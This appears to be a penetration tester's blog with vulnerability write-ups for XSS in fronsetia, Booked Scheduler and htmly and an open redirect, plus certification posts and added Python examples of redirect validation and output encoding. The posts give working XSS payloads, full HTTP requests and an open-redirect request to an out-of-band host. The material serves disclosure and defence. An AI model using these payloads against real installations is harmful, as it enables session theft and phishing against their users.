Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

Description

- It was found that the application was vulnerable to Reflected XSS


Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Visit main page of the application.
  2. In the "WSDL Location" input field, enter the following payload: "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]


// HTTP Response

HTTP/1.1 200 
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive

[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]
Thursday, 7 November 2024

It's Official - BSCP Certified

It's official. I'm BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)
Key takeaways from the attempts:

  • Don't give up
  • It's a difficult exam
  • Check all the relevant labs in the PortSwigger Academy
  • Check for bypasses in the Academy labs
  • Make sure to have a good list of notes, such as payloads and bypasses, ready

That's it folks!

Saturday, 19 October 2024

Friday Fun Pentest Series - 13 - Reflected XSS - booked scheduler v2.8.5

Description

- It was found that the application suffered from Reflected XSS on several pages


Reflected XSS #1 - "reservation.php"

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>

Reflected XSS #2 - "schedule.php"

// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on




Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter


Open Redirect

Steps to Reproduce:

  1. Log in and intercept the HTTP request with a proxy such as Burp Suite or ZAP
  2. In the "resume" parameter, add the redirect URL, e.g. a Burp Collaborator URL
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
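The 302 above shows the "resume" value being copied straight into the Location header. The usual fix is to treat "resume" as a path inside the application and fall back to a fixed landing page for anything else. The following is an added example written for this post, not Booked Scheduler's own code: the function name, the DEFAULT_LANDING path and the attacker hostname are constructed placeholders, and it rejects absolute URLs, scheme-relative "//host" forms, backslash variants and values containing whitespace or control characters.

```python
"""Validate a post-login "resume" target so it can only point back into the app.

Added example for the open-redirect write-up above; not Booked Scheduler's code.
All names here (safe_resume_target, DEFAULT_LANDING, the sample hosts) are constructed.
"""
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

# Constructed placeholder: where the app sends users when "resume" is missing or unsafe.
DEFAULT_LANDING = "/Web/dashboard.php"


def safe_resume_target(resume: Optional[str], default: str = DEFAULT_LANDING) -> str:
    """Return `resume` if it is a path within this application, otherwise `default`.

    Rejects anything a browser would treat as leaving the current origin:
    absolute URLs (scheme present), scheme-relative "//host" forms, backslash
    variants that some browsers normalise to "/", and whitespace or control
    characters that could be used to smuggle a scheme past naive checks.
    """
    if not resume:
        return default
    # Control characters and whitespace have no place in a redirect target.
    if any(ord(c) < 0x20 or c.isspace() for c in resume):
        return default
    parts = urlsplit(resume)
    # "https://attacker", "//attacker" and "javascript:..." all carry a scheme or netloc.
    if parts.scheme or parts.netloc:
        return default
    path = parts.path
    # Require an application-rooted path; refuse "//" and backslash prefixes.
    if not path.startswith("/") or path.startswith("//") or "\\" in path:
        return default
    # Rebuild from components so only path, query and fragment survive.
    return urlunsplit(("", "", path, parts.query, parts.fragment))


if __name__ == "__main__":
    # Constructed sample inputs: the Collaborator-style host stands in for the one in the post.
    for candidate in (
        "https://attacker.example/",
        "//attacker.example/",
        "/\\attacker.example",
        "javascript:alert(1)",
        "/Web/schedule.php?sid=1",
        None,
    ):
        print(repr(candidate), "->", safe_resume_target(candidate))
```

The fallback is deliberately a constant rather than the Referer or another request value, so a rejected target can never be replaced by a second attacker-controlled one.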

Saturday, 5 October 2024

New Certification Study - SANS 522

Happy to announce that I have enrolled on the SANS 522 course for Web Security. I will keep updating my blog on what I have learned so far.


Introduction

  • The instructor is Jason Lam
  • The course comes with six books in PDF and hardcopy format
  • I opted in for purchasing the exam voucher and two practice tests
  • The course provides a VM so you can practice
  • It also has on-demand videos for each module and topic


Book 1:

  • Focuses on misconfigurations
  • Architecture security
  • Basics of how the web works
  • SSRF
  • HTTP methods

Book 2:

  • Input validation
  • Injection attacks and their mitigations
  • CSRF and other attacks including defences
  • File uploads functionality
  • Unicode attacks


Book 3:

  • Authentication security
  • Authorization security
  • SAML/Oauth security


Book 4:

  • Frontend security
  • AJAX security
  • Web services
  • NodeJS security
  • Clickjacking
  • Browser security


Book 5:

  • API security
  • GraphQL security
  • Deserialization

The link for the course is here:

https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/



Monday, 16 September 2024

Friday Fun Pentest Series - 11 - Stored XSS in "Edit Profile" - htmlyv2.9.9


Description

- It was found that the application suffers from stored XSS

- The vulnerability was found to be in the "Edit Profile" page

- The vulnerable parameter was "Content"


Stored XSS in "Edit Profile"

Steps to Reproduce:

  1. Log in as author
  2. Browse to "Edit Profile"
  3. In the "Content" field, add the payload "><img src=x onerror=alert(1)>
  4. Then refresh the "Edit Profile" page

Friday Fun Pentest Series - 10 - Stored XSS in "Menu Editor" - htmlyv2.9.9

Description

- It was found that the application suffers from stored XSS

- The vulnerability was found to be in the "Menu Editor" page

- The vulnerable parameters were "Name" and "Slug"


Stored XSS in "Menu Editor"

Steps to Reproduce:

  1. Log in as admin or author
  2. Browse to "Menu Editor"
  3. In the "Name" field, add the payload "><img src=x onerror=alert(1)>
  4. In the "Slug" field, add the payload "><img src=x onerror=alert(1)>
  5. Click "Save Edit" > "Save Menu"
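Every XSS in this series (the fronsetia title, the Booked Scheduler "Return to the last page" link, and the htmly profile and menu fields) has the same root cause: a user-supplied value is written into HTML without encoding for the context it lands in. The block below is an added example, written in Python rather than the JSP/PHP of the affected applications and not code from any of them. It renders the three contexts seen in these write-ups (element text, a URL inside an href attribute, and a plain attribute value) with encoding, keeps the unencoded link construction from the Booked Scheduler response beside it for contrast, and uses Python's HTML parser to check which tags and event-handler attributes the browser would actually see. The function names and paths are constructed; the payload is the one quoted in the posts.

```python
"""Context-aware output encoding for the reflected and stored XSS cases in this series.

Added example; not code from fronsetia, Booked Scheduler or htmly.
Function names and sample paths are constructed for illustration.
"""
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urlencode

# The payload quoted in the write-ups, used here as the test input.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def render_title(wsdl_location: str) -> str:
    """Element text context: the <title> of show_operations.jsp."""
    return "<title> Fronsetia: " + html.escape(wsdl_location) + " </title>"


def render_return_link_unsafe(path: str, rid: str) -> str:
    """Unencoded concatenation, the pattern visible in the reservation.php response."""
    return ('<h5><a href="' + path + '?rid=' + rid
            + '">Return to the last page that you were on</a></h5>')


def render_return_link(path: str, params: Dict[str, str]) -> str:
    """URL-in-attribute context, encoded in two layers.

    The query string is percent-encoded so the value cannot change the URL's
    structure, then the whole attribute value is HTML-escaped so it cannot
    close the href="..." attribute.
    """
    url = path + "?" + urlencode(params)
    return ('<h5><a href="' + html.escape(url, quote=True)
            + '">Return to the last page that you were on</a></h5>')


def render_attribute(name: str, value: str) -> str:
    """Plain attribute context, e.g. a profile or menu field echoed back into a form."""
    return ('<input name="' + html.escape(name, quote=True)
            + '" value="' + html.escape(value, quote=True) + '">')


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute the parser encounters."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def tags_and_handlers(fragment: str) -> Tuple[List[str], List[str]]:
    """Return (start tags, event-handler attribute names) a browser would parse out."""
    collector = _TagCollector()
    collector.feed(fragment)
    return collector.tags, collector.handlers


if __name__ == "__main__":
    # Constructed sample path; the real application paths differ per install.
    path = "//localhost/Web/reservation.php"
    for label, fragment in (
        ("title, encoded", render_title(PAYLOAD)),
        ("link, unencoded", render_return_link_unsafe(path, PAYLOAD)),
        ("link, encoded", render_return_link(path, {"rid": PAYLOAD})),
        ("attribute, encoded", render_attribute("content", PAYLOAD)),
    ):
        print(f"{label}: {tags_and_handlers(fragment)}")
```

Only the unencoded link yields an extra img tag with an onerror handler; in the encoded variants the payload survives as visible text, which is the intended outcome of output encoding.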

